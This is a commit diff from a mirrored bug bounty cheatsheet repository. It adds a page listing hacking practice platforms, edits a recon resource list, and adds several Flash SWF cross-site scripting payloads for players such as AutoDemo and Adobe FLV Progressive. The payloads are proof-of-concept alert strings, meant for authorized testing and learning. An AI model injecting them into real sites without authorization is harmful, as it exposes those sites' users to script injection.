mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-25 12:30:19 +00:00
Merge branch 'master' into master
This commit is contained in:
commit
37ae6613ac
4 changed files with 19 additions and 4 deletions
|
@ -4,6 +4,7 @@
|
|||
- [Books](cheatsheets/books.md)
|
||||
- [Special Tools](cheatsheets/special-tools.md)
|
||||
- [Recon](cheatsheets/recon.md)
|
||||
- [Practice Platforms](cheatsheets/practice-platforms.md)
|
||||
- [XSS](cheatsheets/xss.md)
|
||||
- [SQLI](cheatsheets/sqli.md)
|
||||
- [SSRF](cheatsheets/ssrf.md)
|
||||
|
@ -53,3 +54,4 @@ We like to keep our Markdown files as uniform as possible. So if you submit a PR
|
|||
- [yasinS](https://github.com/yasinS)
|
||||
- [neutrinoguy](https://github.com/neutrinoguy)
|
||||
- [kuromatae](https://github.com/kuromatae)
|
||||
- [And many more ...](https://github.com/EdOverflow/bugbounty-cheatsheet/graphs/contributors)
|
||||
|
|
9
cheatsheets/practice-platforms.md
Normal file
9
cheatsheets/practice-platforms.md
Normal file
|
@ -0,0 +1,9 @@
|
|||
## Practice Platforms
|
||||
|
||||
- [Pentesterlab](https://pentesterlab.com/)
|
||||
- [XSS Game](https://xss-game.appspot.com/)
|
||||
- [Hack This Site](https://www.hackthissite.org)
|
||||
- [Root-Me](https://www.root-me.org)
|
||||
- [HackTheBox](https://www.hackthebox.eu)
|
||||
- [Hack Me](https://hack.me)
|
||||
- [CTF 365](https://ctf365.com)
|
|
@ -38,8 +38,8 @@ otherapp.10.0.0.1.nip.io
|
|||
- [VirusTotal](https://virustotal.com/en-gb/domain/google.com/information/) (WHOIS, DNS, and subdomain recon)
|
||||
- [crt.sh](https://crt.sh/?q=%25.uber.com) (SSL certificate search)
|
||||
- [Google CT](https://transparencyreport.google.com/https/certificates) (SSL certificate transparency search)
|
||||
- [Wayback Machine](https://archive.org/web/) (Find Intresting stuff hosted on the Domain in past)
|
||||
- http://ipv4info.com (Find all domains inside an IP block owned by the Company/Organization)
|
||||
- [PenTest Tools](https://pentest-tools.com/information-gathering/google-hacking) (Google dorks)
|
||||
|
||||
|
||||
**Report Templates**
|
||||
|
||||
|
|
|
@ -120,7 +120,7 @@ javas	cript://www.google.com/%0Aalert(1)
|
|||
|
||||
- FlashMediaElement: <code>flashmediaelement.swf?jsinitfunctio%gn=alert`1`</code>
|
||||
|
||||
- videoJS: `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
|
||||
- videoJS: `video-js.swf?readyFunction=confirm` and `video-js.swf?readyFunction=alert%28document.domain%2b'%20XSS'%29`
|
||||
|
||||
- YUI "io.swf": `io.swf?yid=\"));}catch(e){alert(document.domain);}//`
|
||||
|
||||
|
@ -128,6 +128,10 @@ javas	cript://www.google.com/%0Aalert(1)
|
|||
|
||||
- Open Flash Chart: `open-flash-chart.swf?get-data=(function(){alert(1)})()`
|
||||
|
||||
- AutoDemo: `control.swf?onend=javascript:alert(1)//`
|
||||
|
||||
- Adobe FLV Progressive: `/main.swf?baseurl=asfunction:getURL,javascript:alert(1)//` and `/FLVPlayer_Progressive.swf?skinName=asfunction:getURL,javascript:alert(1)//`
|
||||
|
||||
- Banner.swf (generic): `banner.swf?clickTAG=javascript:alert(document.domain);//`
|
||||
|
||||
- JWPlayer (legacy): `player.swf?playerready=alert(document.domain)` and `/player.swf?tracecall=alert(document.domain)`
|
||||
|
@ -136,7 +140,7 @@ javas	cript://www.google.com/%0Aalert(1)
|
|||
|
||||
- FlowPlayer 3.2.7: `flowplayer-3.2.7.swf?config={"clip":{"url":"http://edge.flowplayer.org/bauhaus.mp4","linkUrl":"JavaScriPt:confirm(document.domain)"}}&.swf`
|
||||
|
||||
_Note: Useful reference on SWF XSS construction from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
|
||||
_Note: Useful reference on constructing Flash-based XSS payloads from [MWR Labs](https://labs.mwrinfosecurity.com/blog/popping-alert1-in-flash/)._
|
||||
|
||||
**Lightweight Markup Languages**
|
||||
|
||||
|
|
Loading…
Reference in a new issue